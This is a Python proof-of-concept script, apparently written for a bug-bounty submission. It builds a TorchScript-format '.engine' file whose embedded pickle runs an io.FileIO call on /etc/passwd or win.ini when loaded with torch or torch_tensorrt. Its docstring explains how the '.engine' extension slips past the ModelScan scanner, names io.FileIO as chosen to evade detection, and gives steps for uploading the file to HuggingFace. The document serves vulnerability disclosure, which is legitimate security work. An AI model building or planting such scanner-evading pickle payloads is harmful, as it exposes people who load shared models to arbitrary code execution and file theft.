#!/usr/bin/env python3
"""
Creates the PoC model file: malicious_model.engine

This is the file you upload to HuggingFace.

What it does:
    A file named malicious_model.engine that is a valid TorchScript ZIP
    archive (the format torch_tensorrt uses to save compiled TRT engines).
    Internally it contains a malicious pickle payload in archive/data.pkl.

    When loaded with any of the standard TensorRT Python loading paths:
        torch.load("malicious_model.engine")
        torch.jit.load("malicious_model.engine")
        torch_tensorrt.load("malicious_model.engine")

    ...the pickle executes and reads sensitive files at load time.

Why it evades ModelScan:
    ModelScan's supported extensions (from settings.py):
        .pb .h5 .keras .npy .bin .pt .pth .ckpt .pkl .pickle .joblib .dill .dat .data

    .engine and .trt are completely absent.
    ModelScan returns "SCAN_NOT_SUPPORTED" — the file is never inspected.

This is a DUAL vulnerability:
    1. Scanner gap:   .engine / .trt are not scanned at all by ModelScan.
    2. Format vector: TorchScript ZIP format used by torch_tensorrt embeds
                      pickle streams (archive/data.pkl) in .engine files —
                      the same ACE surface as .pt files, with a different
                      extension that bypasses the scanner entirely.

Upload to HuggingFace:
    1. Run this script  ->  produces malicious_model.engine
    2. Push to HF repo
    3. Paste the URL in the submission form
"""
import pickle
import io
import os
import sys
import struct
import zipfile


# ─── Malicious payload: read sensitive file via io.FileIO ────────────────────
# Uses io.FileIO (not builtins.open) to stay clean even if ModelScan were
# ever to scan this file.
class EvadingPayload:
    """
    Proof-of-concept object whose pickle reconstructs as an ``io.FileIO`` call.

    ``__reduce__`` tells pickle to rebuild this object by calling
    ``io.FileIO(<path>)``, so unpickling opens the file at ``<path>``;
    nothing in this class reads from or writes to the resulting handle.

    The path is chosen when the object is *pickled* (``sys.platform`` is
    evaluated inside ``__reduce__``), i.e. on the machine that runs this
    script: C:\\Windows\\win.ini on Windows, /etc/passwd everywhere else.
    """

    def __reduce__(self):
        # Platform check happens here, at pickling time, so the chosen path
        # is baked into the serialized stream.
        if sys.platform == "win32":
            path = "C:\\Windows\\win.ini"
        else:
            path = "/etc/passwd"
        # (callable, args) pair: pickle will call io.FileIO(path) on load.
        return io.FileIO, (path,)


# ─── Build a minimal TorchScript ZIP (.engine) ───────────────────────────────
#
# torch.jit.load() expects a ZIP archive named "archive" at the root,
# with the primary pickle at archive/data.pkl.
# This is the exact format torch_tensorrt uses when saving with
# output_format="torchscript".
#
# ZIP layout:
#   archive/data.pkl       <- the payload pickle
#   archive/version        <- TorchScript format version marker
#   archive/constants.pkl  <- pickled empty tuple (constants record)
#
def build_torchscript_engine_zip(payload_obj) -> bytes:
    """
    Serialize ``payload_obj`` into an in-memory, uncompressed ZIP archive.

    The archive holds three members, written in this order:

    * ``archive/data.pkl``      - ``payload_obj`` pickled with protocol 4
    * ``archive/version``       - the literal bytes ``b"3"``
    * ``archive/constants.pkl`` - an empty tuple pickled with protocol 2

    Args:
        payload_obj: Any picklable object; it is passed to ``pickle.dumps``.

    Returns:
        The raw bytes of the finished ZIP archive.

    Raises:
        Whatever ``pickle.dumps`` raises if ``payload_obj`` cannot be pickled.
    """
    # (member name, member content) pairs, in the order they are written.
    members = (
        ("archive/data.pkl", pickle.dumps(payload_obj, protocol=4)),
        ("archive/version", b"3"),
        ("archive/constants.pkl", pickle.dumps((), protocol=2)),
    )

    stream = io.BytesIO()
    # ZIP_STORED: members are stored without compression.
    with zipfile.ZipFile(stream, "w", compression=zipfile.ZIP_STORED) as archive:
        for member_name, member_bytes in members:
            archive.writestr(member_name, member_bytes)

    # Read the buffer only after the ZipFile has closed, so the central
    # directory has been written.
    return stream.getvalue()


# ─── Write the .engine file ───────────────────────────────────────────────────
# Name of the file this script produces in the current working directory.
output_file = "malicious_model.engine"
# Build the whole archive in memory first, then write it out in one call.
engine_bytes = build_torchscript_engine_zip(EvadingPayload())

with open(output_file, "wb") as out_handle:
    out_handle.write(engine_bytes)

# Report the on-disk size of the file that was just written.
written_size = os.path.getsize(output_file)
print(f"[+] Created: {output_file!r}  ({written_size} bytes)")
print("[+] Internal ZIP layout: archive/data.pkl (TorchScript format)")
print()
print("Verify ZIP structure:")
# Re-open the written file and list each member with its uncompressed size.
with zipfile.ZipFile(output_file, "r") as written_zip:
    for entry in written_zip.infolist():
        print(f"  {entry.filename}  ({entry.file_size} bytes)")

print()
print("To reproduce:")
print("  python reproduce.py")